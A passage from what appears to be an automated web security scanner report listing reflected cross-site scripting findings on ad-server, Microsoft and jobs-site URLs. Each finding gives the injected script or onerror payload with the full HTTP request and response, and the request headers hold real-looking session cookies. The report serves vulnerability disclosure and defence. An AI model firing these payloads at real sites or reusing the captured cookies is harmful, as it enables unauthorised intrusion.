<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group]96362"><script>alert(1)</script>af6646d0ffc;adiframe=y">
...[SNIP]...

3.12. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785959/0/170/ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload aabb5><script>alert(1)</script>bdb618d8812 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5205/1785959/0/170/ADTECH;target=aabb5><script>alert(1)</script>bdb618d8812 HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 270

<html><body><base target=aabb5><script>alert(1)</script>bdb618d8812><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/5205/1785959/0/170/ADTECH;target=aabb5><s
...[SNIP]...

3.13. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785960/0/225/ADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3109b"><script>alert(1)</script>3efc1e6b184 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe3109b"><script>alert(1)</script>3efc1e6b184/3.0/5205/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group] HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 371

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn3109b"><script>alert(1)</script>3efc1e6b184/3.0/5205/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group];adiframe=y">
...[SNIP]...

3.14. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785960/0/225/ADTECH

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a297"><script>alert(1)</script>e672ef11e74 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.05a297"><script>alert(1)</script>e672ef11e74/5205/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group] HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 371

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.05a297"><script>alert(1)</script>e672ef11e74/5205/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group];adiframe=y">
...[SNIP]...

3.15. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785960/0/225/ADTECH

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 675dd"><script>alert(1)</script>1f1c87414ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5205675dd"><script>alert(1)</script>1f1c87414ca/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group] HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 371

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/5205675dd"><script>alert(1)</script>1f1c87414ca/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group];adiframe=y">
...[SNIP]...

3.16. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785960/0/225/ADTECH

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15372"><script>alert(1)</script>519552992e4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5205/178596015372"><script>alert(1)</script>519552992e4/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group] HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 371

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/5205/178596015372"><script>alert(1)</script>519552992e4/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group];adiframe=y">
...[SNIP]...

3.17. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785960/0/225/ADTECH

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4983"><script>alert(1)</script>a5233a774cb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5205/1785960/0a4983"><script>alert(1)</script>a5233a774cb/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group] HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 371

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/5205/1785960/0a4983"><script>alert(1)</script>a5233a774cb/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group];adiframe=y">
...[SNIP]...

3.18. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785960/0/225/ADTECH

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56715"><script>alert(1)</script>1b3cc5afd7e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5205/1785960/0/22556715"><script>alert(1)</script>1b3cc5afd7e/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group] HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 371

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/5205/1785960/0/22556715"><script>alert(1)</script>1b3cc5afd7e/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group];adiframe=y">
...[SNIP]...

3.19. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785960/0/225/ADTECH

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2215b"><script>alert(1)</script>9c7a1b47bba was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5205/1785960/0/225/ADTECH2215b"><script>alert(1)</script>9c7a1b47bba;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group] HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 371

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/5205/1785960/0/225/ADTECH2215b"><script>alert(1)</script>9c7a1b47bba;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group];adiframe=y">
...[SNIP]...

3.20. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785960/0/225/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec250"><script>alert(1)</script>e520c05f978 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5205/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group]&ec250"><script>alert(1)</script>e520c05f978=1 HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 374

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/5205/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group]&ec250"><script>alert(1)</script>e520c05f978=1;adiframe=y">
...[SNIP]...

3.21. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785960/0/225/ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload b937a><script>alert(1)</script>900b161fd17 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5205/1785960/0/225/ADTECH;target=b937a><script>alert(1)</script>900b161fd17 HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 270

<html><body><base target=b937a><script>alert(1)</script>900b161fd17><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/5205/1785960/0/225/ADTECH;target=b937a><s
...[SNIP]...

3.22. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785960/0/225/ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24df1"><script>alert(1)</script>1376414e666 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5205/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group]24df1"><script>alert(1)</script>1376414e666 HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 371

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/5205/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group]24df1"><script>alert(1)</script>1376414e666;adiframe=y">
...[SNIP]...

3.23. http://i2.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i2.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6945e<img%20src%3da%20onerror%3dalert(1)>d02588c1036 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6945e<img src=a onerror=alert(1)>d02588c1036 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=HeaderSearchTextBox&btnid=HeaderSearchButton&brand=TechNet&loc=en-us&watermark=TechNet&focusOnInit=false&6945e<img%20src%3da%20onerror%3dalert(1)>d02588c1036=1 HTTP/1.1
Host: i2.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/security/cc308589
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A=I&I=AxUFAAAAAADYBwAAu2WtoptBCfDaQruVeUcU/w!!&M=1; WT_NVR_RU=0=technet:1=:2=; MUID=B506C07761D7465D924574124E3C14DF; MC1=GUID=845eef4a7ff18745a494666b76292718&HASH=4aef&LV=20114&V=3; msdn=L=1033; MSID=Microsoft.CreationDate=04/19/2011 11:23:33&Microsoft.LastVisitDate=04/19/2011 11:25:31&Microsoft.VisitStartDate=04/19/2011 11:23:33&Microsoft.CookieId=64491e77-08ce-4e1f-9bac-3648a81416de&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=4&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0253-8586-9443-3504; omniID=1303134620609_e49b_0c9c_6cf1_45f64f5a5361; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-2082981296.30145999:lv=1303495946458:ss=1303495946458

Response

HTTP/1.1 200 OK
ntCoent-Length: 12915
Content-Type: application/x-javascript
ETag: a5cf5e2c5d91dc93e7ed574c10557cf5
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB32
Cache-Control: public, max-age=43200
Expires: Sat, 23 Apr 2011 09:13:04 GMT
Date: Fri, 22 Apr 2011 21:13:04 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 12915


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
archBox({"allowEmptySearch":false,"appId":"2","boxId":"HeaderSearchTextBox","btnId":"HeaderSearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&6945e<img src=a onerror=alert(1)>d02588c1036=1","scopeId":"9","searchLocation":"http:\/\/social.TechNet.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search Tec
...[SNIP]...

3.24. http://jobs.ctg.eu/N [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /N

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d636"><img%20src%3da%20onerror%3dalert(1)>cd559f46f5d was submitted in the REST URL parameter 1. This input was echoed as 4d636"><img src=a onerror=alert(1)>cd559f46f5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /N4d636"><img%20src%3da%20onerror%3dalert(1)>cd559f46f5d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: jobs.ctg.eu

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 17:13:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS5fce01b171785c9633d86359009a9819=b257485ec059ff6942c32478304dbbe9; expires=Sun, 15-May-2011 20:46:44 GMT; path=/; domain=.jobs.ctg.eu
Last-Modified: Fri, 22 Apr 2011 17:13:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="N4d636"><img src=a onerror=alert(1)>cd559f46f5d not-front not-logged-in page-n4d636img-srca-onerroralert1cd559f46f5d no-sidebars">
...[SNIP]...

3.25. http://jobs.ctg.eu/jobs/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /jobs/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2936"><img%20src%3da%20onerror%3dalert(1)>c561c14c380 was submitted in the REST URL parameter 1. This input was echoed as a2936"><img src=a onerror=alert(1)>c561c14c380 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /jobsa2936"><img%20src%3da%20onerror%3dalert(1)>c561c14c380/ HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:50:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:50:59 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="jobsa2936"><img src=a onerror=alert(1)>c561c14c380 not-front not-logged-in page-jobsa2936img-srca-onerroralert1c561c14c380 no-sidebars">
...[SNIP]...

3.26. http://jobs.ctg.eu/misc/drupal.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /misc/drupal.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6db47"><img%20src%3da%20onerror%3dalert(1)>44ae54b8308 was submitted in the REST URL parameter 1. This input was echoed as 6db47"><img src=a onerror=alert(1)>44ae54b8308 in the application's response.

